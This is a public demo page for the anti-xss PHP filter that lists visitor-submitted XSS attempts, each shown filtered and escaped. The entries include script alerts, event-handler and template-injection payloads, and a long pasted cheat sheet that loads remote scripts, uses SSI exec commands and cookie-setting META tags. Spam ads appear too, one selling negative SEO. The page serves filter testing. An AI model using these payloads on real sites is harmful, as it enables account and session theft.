Anti-XSS for PHP

{ @hacker | "try to bypass this XSS filter" }

github.com/voku/anti-xss



If you need some inspiration for new attacks, take a look at the PHPUnit tests. I have already included test from e.g. "DOMPurify", "JS-XSS" and "LaravelSecurity". Here you can find some more XSS strings:



PS: This demo, is also available at github.com and you can also create pull-requests, here.

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert);

result with twig: {{ xss.xss | escape }}:

alert(document.location);

keyword(s):

description:

by Stryhun | at 2021-09-27 10:18:39

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there,\\r\\n\\r\\nHire Live Chat Agents - Unlimited chats - 24/7 coverage - Good Communication - Top Notch Support - Increase your sales 3 times with our 24/7 Live Chat Agents to generate more leads and excellent customer support. \\r\\nhttps://crotonz.com/live-chat.php\\r\\n\\r\\nHire Virtual Assistants and Agents for your website & business. Flexible Plans/ Pricing and Expert Employees. 15 days Free Trial. \\r\\nhttps://crotonz.com/virtual-assistants.php\\r\\n\\r\\nBest Regards\\r\\nSam Miller\\r\\ninfo@crotonz.com

result with twig: {{ xss.xss | escape }}:

Hi there,\\r\\n\\r\\nHire Live Chat Agents - Unlimited chats - 24/7 coverage - Good Communication - Top Notch Support - Increase your sales 3 times with our 24/7 Live Chat Agents to generate more leads and excellent customer support. \\r\\nhttps://crotonz.com/live-chat.php\\r\\n\\r\\nHire Virtual Assistants and Agents for your website & business. Flexible Plans/ Pricing and Expert Employees. 15 days Free Trial. \\r\\nhttps://crotonz.com/virtual-assistants.php\\r\\n\\r\\nBest Regards\\r\\nSam Miller\\r\\ninfo@crotonz.com

keyword(s):

description: Hi there,\\r\\n\\r\\nHire Live Chat Agents - Unlimited chats - 24/7 coverage - Good Communication - Top Notch Support - Increase your sales 3 times with our 24/7 Live Chat Agents to generate more leads and excellent customer support. \\r\\nhttps://crotonz.com/live-chat.php\\r\\n\\r\\nHire Virtual Assistants and Agents for your website & business. Flexible Plans/ Pricing and Expert Employees. 15 days Free Trial. \\r\\nhttps://crotonz.com/virtual-assistants.php\\r\\n\\r\\nBest Regards\\r\\nSam Miller\\r\\ninfo@crotonz.com

by Teodoro Robinson | at 2021-09-25 23:08:50

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dc

result with twig: {{ xss.xss | escape }}:

dc

keyword(s): cd

description: dc

by dcd | at 2021-09-23 18:27:05

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

hii" accesskey="x" ="alert(document.domain)

result with twig: {{ xss.xss | escape }}:

hii" accesskey="x" onclick="alert(document.domain)

keyword(s): a

description: a

by q | at 2021-09-23 11:23:50

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\'aa\\\');</script>

keyword(s): test

description: test

by test | at 2021-09-19 07:23:14

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

efeefefe

result with twig: {{ xss.xss | escape }}:

efeefefe

keyword(s): tse

description: etes

by budi | at 2021-09-16 16:41:31

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<!--[if IE]>blablaalert(\\\'kokot\\\');\\\">\\r\\nbubub

result with twig: {{ xss.xss | escape }}:

<!--[if IE]>blabla<![endif]-->\\r\\n<img src=\\\"kokot.jpg\\\" onerror=\\\"<script>alert(\\\'kokot\\\');</script>\\\">\\r\\nbubub

keyword(s): blbecek

description: holahej

by debil | at 2021-09-13 15:56:12

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

https://test.com/\\\"onmouseover={alert`1`}\\\"

result with twig: {{ xss.xss | escape }}:

https://test.com/\\\"onmouse<marquee>over={alert`1`}<marquee>\\\"</marquee>

keyword(s): a

description: asdsad

by C | at 2021-09-10 13:58:40

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Foo

\\r\\niwjhf iuew

result with twig: {{ xss.xss | escape }}:

<p>Foo</p>\\r\\n<besch>iwjhf iuew</besch>

keyword(s):

description:

by me | at 2021-09-09 15:20:10

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

<beschreibung>test</beschreibung>

keyword(s):

description:

by me3 | at 2021-09-09 15:19:11

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s):

description:

by me2 | at 2021-09-09 15:18:44

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<beschreibung fo uhefihwefiuhwef> </beschreibung>

keyword(s):

description:

by Me | at 2021-09-09 15:18:21

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script></script>

keyword(s):

description:

by aaaa | at 2021-09-08 14:17:09

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdds

result with twig: {{ xss.xss | escape }}:

sdds

keyword(s):

description:

by dcvxzser434634<scropt> | at 2021-09-08 14:09:46

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

The real L word
\\r\\n

result with twig: {{ xss.xss | escape }}:

<blockquote class=\\\\\\\\\\\\\\\"imgur-embed-pub\\\\\\\\\\\\\\\" lang=\\\\\\\\\\\\\\\"en\\\\\\\\\\\\\\\" data-id=\\\\\\\\\\\\\\\"a/JM2Eh4Z\\\\\\\\\\\\\\\" ><a href=\\\\\\\\\\\\\\\"//imgur.com/a/JM2Eh4Z\\\\\\\\\\\\\\\">The real L word</a></blockquote><script async src=\\\\\\\\\\\\\\\"//s.imgur.com/min/embed.js\\\\\\\\\\\\\\\" charset=\\\\\\\\\\\\\\\"utf-8\\\\\\\\\\\\\\\"></script>\\r\\n

keyword(s):

description:

by بليسبسيب | at 2021-09-08 13:19:28

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

vdhsh

result with twig: {{ xss.xss | escape }}:

vdhsh<script>alert(\\\"hey\\\");</script>

keyword(s):

description:

by | at 2021-09-08 12:03:50

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Gx. Vbvbn

result with twig: {{ xss.xss | escape }}:

Gx. Vbvbn

keyword(s): Cvbvccc

description: Vvvvvvnn

by Ffzs | at 2021-09-08 12:02:03

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\"hey\\\");</script>

keyword(s):

description:

by l | at 2021-09-04 15:26:15

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\\'\\\';!--\\\"=&{()}

result with twig: {{ xss.xss | escape }}:

\\\'\\\';!--\\\"<XSS>=&{()}

keyword(s):

description:

by l | at 2021-09-04 15:24:01

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

The real L word

result with twig: {{ xss.xss | escape }}:

<blockquote class=\\\"imgur-embed-pub\\\" lang=\\\"en\\\" data-id=\\\"a/JM2Eh4Z\\\" ><a href=\\\"//imgur.com/a/JM2Eh4Z\\\">The real L word</a></blockquote><script async src=\\\"//s.imgur.com/min/embed.js\\\" charset=\\\"utf-8\\\"></script>

keyword(s):

description:

by Teste | at 2021-09-03 15:06:04

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Et ipsum esse volupt

result with twig: {{ xss.xss | escape }}:

Et ipsum esse volupt

keyword(s): Magnam pariatur Ani

description: Sed placeat sint un

by Laboriosam cupidita | at 2021-09-02 16:34:07

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

aa

result with twig: {{ xss.xss | escape }}:

aa

keyword(s): aa

description: {{constructor.constructor(\\\'alert(\\\"XSS\\\")\\\')()}}

by aa | at 2021-09-02 13:18:59

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

result with twig: {{ xss.xss | escape }}:

Hi\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

keyword(s):

description: Hi\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

by Caren Bou | at 2021-09-01 01:33:24

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

We have an amazing database of leads for you.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nThis offer is valid till Friday.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nwww.SunDataGroup.one

result with twig: {{ xss.xss | escape }}:

We have an amazing database of leads for you.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nThis offer is valid till Friday.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nwww.SunDataGroup.one

keyword(s): asdasd

description: asdasd

by asdasd | at 2021-08-31 02:51:23

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src=\\\"\\\"><script>alert(123);</script>

keyword(s):

description:

by | at 2021-08-30 08:15:20

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Search results for \\\"xss\\\"\\r\\n

result with twig: {{ xss.xss | escape }}:

Search results for \\\"xss\\\"\\r\\n

keyword(s): xss

description: jittgk

by liuoy7uykloxss | at 2021-08-29 11:29:28

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Search results for \\\"">xss/<\\\"

result with twig: {{ xss.xss | escape }}:

Search results for \\\"&quot;&gt;xss/&lt;\\\"

keyword(s): xss

description: nooo

by ali | at 2021-08-29 11:26:45

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dsf

result with twig: {{ xss.xss | escape }}:

dsf

keyword(s): dsf

description: <img >kekekeke

by dsf | at 2021-08-27 11:10:28

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\\"=\\\"x\\\">d0mxssd0mxss

result with twig: {{ xss.xss | escape }}:

<p style=\\\"xasd\\\"\\\"x<strong>\\\"=\\\"x\\\">d0mxssd0mxss</p></p>

keyword(s): aasd

description: asd

by asd | at 2021-08-27 09:17:31

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

We have an amazing database of leads for you.\\r\\n\\r\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\r\\n\\r\\nThis offer is valid till Friday.\\r\\n\\r\\nwww.SunDataGroup.one

result with twig: {{ xss.xss | escape }}:

We have an amazing database of leads for you.\\r\\n\\r\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\r\\n\\r\\nThis offer is valid till Friday.\\r\\n\\r\\nwww.SunDataGroup.one

keyword(s):

description: We have an amazing database of leads for you.\\r\\n\\r\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\r\\n\\r\\nThis offer is valid till Friday.\\r\\n\\r\\nwww.SunDataGroup.one

by Dewayne Langston | at 2021-08-27 04:16:49

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test{{constructor.constructor(\\\'alert(document.domain)\\\')()}}

result with twig: {{ xss.xss | escape }}:

test{{constructor.constructor(\\\'alert(document.domain)\\\')()}}

keyword(s):

description:

by bb | at 2021-08-25 19:48:15

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test{{constructor.constructor(\\\'alert(document.domain)\\\')()}}

result with twig: {{ xss.xss | escape }}:

test{{constructor.constructor(\\\'alert(document.domain)\\\')()}}

keyword(s): laravel, vue

description:

by bb | at 2021-08-25 19:47:22

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sasas

result with twig: {{ xss.xss | escape }}:

sasas

keyword(s): hjh

description: jhghjgj

by 111` | at 2021-08-24 14:13:24

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

ádsđ

result with twig: {{ xss.xss | escape }}:

ádsđ

keyword(s): 123

description: ádsdsd

by abc | at 2021-08-23 17:57:06

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\"XSS\\\")</script>

keyword(s): xss

description: test xss

by Sergey | at 2021-08-19 18:33:59

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<body alert(\\\'XSS\\\');\\\">\\r\\n\\\'\\\"></title>\\r\\n</textarea>\\\'\\\">\\r\\n\\\'\\\"\\\"> alert(\\\'X \\\\nS \\\\nS\\\');\\r\\n<<<alert(123)\\r\\n<html><noalert><noscript>(123)</noscript>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n\\\'></select>\\r\\n\\\'>\\\">\\r\\n}</style>\\r\\n\\r\\na=\\\"get\\\";b=\\\"URL\\\";c=\\\"\\\";d=\\\"alert(\\\'xss\\\');\\\";eval(a+b+c+d);\\r\\n=\\\'>\\r\\n\\\"+src=\\\"http://yoursite.com/xss.js?69,69\\\">\\r\\n<body background=\\\'\\\">></body>\\r\\n\\\">/XaDoS/>\\r\\n\\\">/KinG-InFeT.NeT/>\\r\\nsrc=\\\"http://www.site.com/XSS.js\\\">\\r\\nIj48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\\r\\n!--\\\" />\\r\\n<marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\">><marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\'\\\"></title>><marquee><h1>XSS by xss</h1></marquee>\\r\\n<img \\\"\\\"\\\"><marquee><h1>XSS by xss</h1></marquee>\\r\\n<marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\">\\\"></marquee>\\r\\n\\\'\\\"></title>><marquee><h1>XSS by xss</h1></marquee>\\r\\n<iframe src=\\\"(\\\'XSS by \\\\nxss\\\');\\\"></iframe><marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\'><img ><img ><img >\\\">\\r\\n<img >\\\<\\\/\\\i\\\f\\\r\\\a\\\m\\\e\\\>\\\');\\\"></img>\\r\\n</body>\\r\\n</html>\\r\\n\\r\\n\\r\\n<BODY >\\r\\n<BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\>\\>\\>\\>\\>\\>\\>\\>\\>\\ HREF="('XSS');//" >\\r\\n<A HREF="http://66.102.7.147/">XSS</A>\\r\\n<A HREF="http://www.google.com">XSS</A>\\r\\n<A HREF="http://1113982867/">XSS</A>\\r\\n<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>\\r\\n<A HREF="http://0102.0146.0007.00000223/">XSS</A>\\r\\n<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>\\r\\n<A HREF="//www.google.com/">XSS</A>\\r\\n<A HREF="//google">XSS</A>\\r\\n<A HREF="http://ha.ckers.org@google">XSS</A>\\r\\n<A HREF="http://google:ha.ckers.org">XSS</A>\\r\\n<A HREF="http://google.com/">XSS</A>\\r\\n<A HREF="http://www.google.com./">XSS</A>\\r\\n<A HREF="'http://www.google.com/'">XSS</A>\\r\\n<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>\\r\\n\\r\\n<img >\\r\\n<img >\\r\\n<img >\\>\\ >>\\>\\>\\>\\r\\n<img >\\r\\n<img >\\>\\>\\></LAYER>\\r\\n<link REL=\\\"stylesheet\\\" HREF=\\\";\\\">\\r\\n<style>li {list-style-image: url(\\\";\\\");</STYLE><UL><LI>XSS\\r\\n<img >\\>\\>\\></iframe>\\r\\n<FRAMESET><FRAME SRC=\\\";\\\"></frameset>\\r\\n<table BACKGROUND=\\\";\\\">\\r\\n<table><TD BACKGROUND=\\\";\\\">\\r\\n<div url(;)\\\">\\r\\n<div url(;)\\\">\\r\\n<div document.vulnerable=true);\\\">\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';</style>\\r\\n<img >\\>\\r\\nexp/*<A >\\r\\n<style TYPE=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<style>.XSS{background-image:url(\\\"\\\");}</STYLE><A ></a>\\r\\n<style type=\\\"text/css\\\">BODY{background:url(\\\"\\\")}</style>\\r\\n<!--[if gte IE 4]><![endif]-->\\r\\n<base HREF=\\\";//\\\">\\r\\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=></object>\\r\\n<XML ID=I><X><C><![<IMG >]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>\\r\\n<XML ID=\\\"xss\\\"><I><B><IMG >></B></I></XML><SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"></span>\\r\\n<html><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSSdocument.vulnerable=true\\\"></BODY></html>\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>document.vulnerable=true\\\'); ?>\\r\\n<meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=\\\">\\r\\n<head><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>\\r\\n<a >\\r\\n<div >\\r\\n<img >\\r\\n<img >\\r\\n<input type=\\\"image\\\" dynsrc=\\\";\\\">\\r\\n<bgsound src=\\\";\\\">\\r\\n&\\r\\n&{document.vulnerable=true;};\\r\\n<img >\\>\\>\\r\\n<img >\\r\\n<img >\\r\\n<a >document.vulnerable=true;\\\">\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=;\\\">\\r\\n<body >\\r\\n<div url(;);\\\">\\r\\n<div url([link to code]);\\\">\\r\\n<div url([link to code]);\\\">\\r\\n<div document.vulnerable=true;);\\\">\\r\\n<style type=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<object classid=\\\"clsid:...\\\" codebase=\\\";\\\">\\r\\n<style><!--</style>\\r\\n<\\r\\n\\r\\n<!-- -- --><!-- -- -->\\r\\n<img >\\r\\n<img >\\\" =\\\"document.vulnerable=true;\\\">\\r\\n<xml src=\\\";\\\">\\r\\n<xml id=\\\"X\\\"><a><b>;</b></a></xml>\\r\\n<div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"></div>\\r\\n[\\\\xC0][\\\\xBC]script>document.vulnerable=true;[\\\\xC0][\\\\xBC]/script>\\r\\n<style>@import\\\'http://www.securitycompass.com/xss.css\\\';</style>\\r\\n<meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\\\">\\r\\n<style>BODY{:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}</style>\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"></object>\\r\\n<HTML xmlns:xss><?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"><xss:xss>XSS</xss:xss></html>\\r\\n\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js>\\\'\\\"-->\\r\\n\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n\\r\\n\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n` SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n\\\'>\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\nPT SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<div url(http://www.securitycompass.com/xss.js);\\\"> [Mozilla]\\r\\n"><BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert("XSS")>\\r\\nalert(1)\\r\\n</br >\\r\\n<scrscriptipt>alert(1)</scrscriptipt>\\r\\n<br size=\\\\"&{alert('XSS')}\\\\">\\r\\nperl -e 'print \\\\"<IMG >\\\\";' > out\\r\\nperl -e 'print \\\\"<SCR\\\\0IPT>alert(\\\\"XSS\\\\")</SCR\\\\0IPT>\\\\";' > out\\r\\n<~/XSS/*-*/>\\r\\n<~/XSS/*-*/>\\r\\n<~/XSS/*-*/>\\r\\n<~/XSS >\\r\\n\\\">\\r\\n</XSS/*-*/>\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n</XSS >\\r\\n\\\';;alert(String.fromCharCode(88,83,83))//\\\\\\\';;alert(String.fromCharCode(88,83,83))//\\\";;alert(String.fromCharCode(88,83,83))//\\\\\\\";;alert(String.fromCharCode(88,83,83))//-->;;\\\";>;\\\';>;;alert(String.fromCharCode(88,83,83));\\r\\n\\\';\\\';;!--\\\";<;XSS>;=&;{()}\\r\\n;alert(\\\';XSS\\\';);\\r\\nSRC=http://ha.ckers.org/xss.js>;;\\r\\n;alert(String.fromCharCode(88,83,83));\\r\\n<;BASE HREF=\\\";(\\\';XSS\\\';);//\\\";>;\\r\\n<;BGSOUND SRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;BODY BACKGROUND=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;BODY >;\\r\\n<;DIV url((\\\';XSS\\\';))\\\";>;\\r\\n<;DIV url(&;#1;(\\\';XSS\\\';))\\\";>;\\r\\n<;DIV alert(\\\';XSS\\\';));\\\";>;\\r\\n<;FRAMESET>;<;FRAME SRC=\\\";(\\\';XSS\\\';);\\\";>;<;/FRAMESET>;\\r\\n<;IFRAME SRC=\\\";(\\\';XSS\\\';);\\\";>;<;/IFRAME>;\\r\\n<;INPUT TYPE=\\\";IMAGE\\\"; SRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=(\\\';XSS\\\';)>;\\r\\n<;IMG DYNSRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG LOWSRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\";>;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser\\r\\nexp/*<;XSS >;li {list-style-image: url(\\\";('XSS')\\\";);}<;/STYLE>;<;UL>;<;LI>;XSS\\r\\n<;IMG SRC=\\\';(\\\";XSS\\\";)\\\';>;\\r\\n<;LAYER SRC=\\\";http://ha.ckers.org/scriptlet.html\\\";>;<;/LAYER>;\\r\\n<;IMG SRC=\\\";\\\";>;\\r\\n;\\r\\n<;META HTTP-EQUIV=\\\";refresh\\\"; CONTENT=\\\";0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\";>;\\r\\n<;META HTTP-EQUIV=\\\";refresh\\\"; CONTENT=\\\";0; URL=http://;URL=(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";\\\";>;\\r\\n<;OBJECT TYPE=\\\";text/x-scriptlet\\\"; DATA=\\\";http://ha.ckers.org/scriptlet.html\\\";>;<;/OBJECT>;\\r\\n<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=(\\\';XSS\\\';)>;<;/OBJECT>;\\r\\n<;EMBED SRC=\\\";http://ha.ckers.org/xss.swf\\\"; AllowScriptAccess=\\\";always\\\";>;<;/EMBED>;\\r\\na=\\\";get\\\";;&;#10;b=\\\";URL(\\\";\\\";;&;#10;c=\\\";\\\";;&;#10;d=\\\";alert(\\\';XSS\\\';);\\\";)\\\";; eval(a+b+c+d);\\r\\n<;STYLE TYPE=\\\";text/javascript\\\";>;alert(\\\';XSS\\\';);<;/STYLE>;\\r\\n<;IMG >;\\r\\n<;XSS >;\\r\\n<;STYLE>;.XSS{background-image:url(\\\";(\\\';XSS\\\';)\\\";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;\\r\\n<;STYLE type=\\\";text/css\\\";>;BODY{background:url(\\\";(\\\';XSS\\\';)\\\";)}<;/STYLE>;\\r\\n<;LINK REL=\\\";stylesheet\\\"; HREF=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;LINK REL=\\\";stylesheet\\\"; HREF=\\\";http://ha.ckers.org/xss.css\\\";>;\\r\\n<;STYLE>;@import\\\';http://ha.ckers.org/xss.css\\\';;<;/STYLE>;\\r\\n<;META HTTP-EQUIV=\\\";Link\\\"; Content=\\\";<;http://ha.ckers.org/xss.css>;; REL=stylesheet\\\";>;\\r\\n<;STYLE>;BODY{:url(\\\";http://ha.ckers.org/xssmoz.xml#xss\\\";)}<;/STYLE>;\\r\\n<;TABLE BACKGROUND=\\\";(\\\';XSS\\\';)\\\";>;<;/TABLE>;\\r\\n<;TABLE>;<;TD BACKGROUND=\\\";(\\\';XSS\\\';)\\\";>;<;/TD>;<;/TABLE>;\\r\\n<;HTML xmlns:xss>;\\r\\n<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=\\\";javas]]>;<;![CDATA[cript:alert(\\\';XSS\\\';);\\\";>;]]>;\\r\\n<;XML ID=\\\";xss\\\";>;<;I>;<;B>;<;IMG SRC=\\\";javas<;!-- -->;cript:alert(\\\';XSS\\\';)\\\";>;<;/B>;<;/I>;<;/XML>;\\r\\n<;XML SRC=\\\";http://ha.ckers.org/xsstest.xml\\\"; ID=I>;<;/XML>;\\r\\n<;HTML>;<;BODY>;\\r\\n<;!--[if gte IE 4]>; \\r\\n<;META HTTP-EQUIV=\\\";Set-Cookie\\\"; Content=\\\";USERID=;alert(\\\';XSS\\\';);\\\";>;\\r\\n<;XSS >;\\r\\nSRC=\\\";http://ha.ckers.org/xss.jpg\\\";>;;\\r\\n<;!--#exec cmd=\\\";/bin/echo \\\';SRC\\\';\\\";-->;<;!--#exec cmd=\\\";/bin/echo \\\';=http://ha.ckers.org/xss.js>;;\\\';\\\";-->;\\r\\n<;? echo(\\\';<;SCR)\\\';;\\r\\n<;BR SIZE=\\\";&;{alert(\\\';XSS\\\';)}\\\";>;\\r\\n<;IMG SRC=(\\\';XSS\\\';)>;\\r\\n<;IMG SRC=(&;quot;XSS&;quot;)>;\\r\\n<;IMG SRC=`(\\\";RSnake says, \\\';XSS\\\';\\\";)`>;\\r\\n<;IMG SRC=(String.fromCharCode(88,83,83))>;\\r\\n<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;\\r\\n<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;\\r\\n<;DIV >;\\r\\n<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;\\r\\n<;HEAD>;<;META HTTP-EQUIV=\\\";CONTENT-TYPE\\\"; CONTENT=\\\";text/html; charset=UTF-7\\\";>; <;/HEAD>;\\r\\n\\\\\\\";;alert(\\\';XSS\\\';);//\\r\\n<;/TITLE>;;alert(\\\"XSS\\\");;\\r\\n<;STYLE>;@im\\\\port\\\';\\\\ja\\\\vasc\\\\ript:alert(\\\";XSS\\\";)\\\';;<;/STYLE>;\\r\\n<;IMG SRC=\\\";(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x09;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x0A;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x0D;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC = \\\"; javascript : a l e r t \\\'; X S S \\\'; ) \\\"; >; \\r\\nperl -e \\\';print \\\";<;IM SRC=java\\\\0script:alert(\\\";XSS\\\";)>\\\";;\\\';>; out\\r\\nperl -e \\\';print \\\";&;<;SCR\\\\0IPT>;alert(\\\";XSS\\\";)<;/SCR\\\\0IPT>;\\\";;\\\'; >; out\\r\\n<;IMG SRC=\\\"; &;#14; (\\\';XSS\\\';);\\\";>;\\r\\nXSS 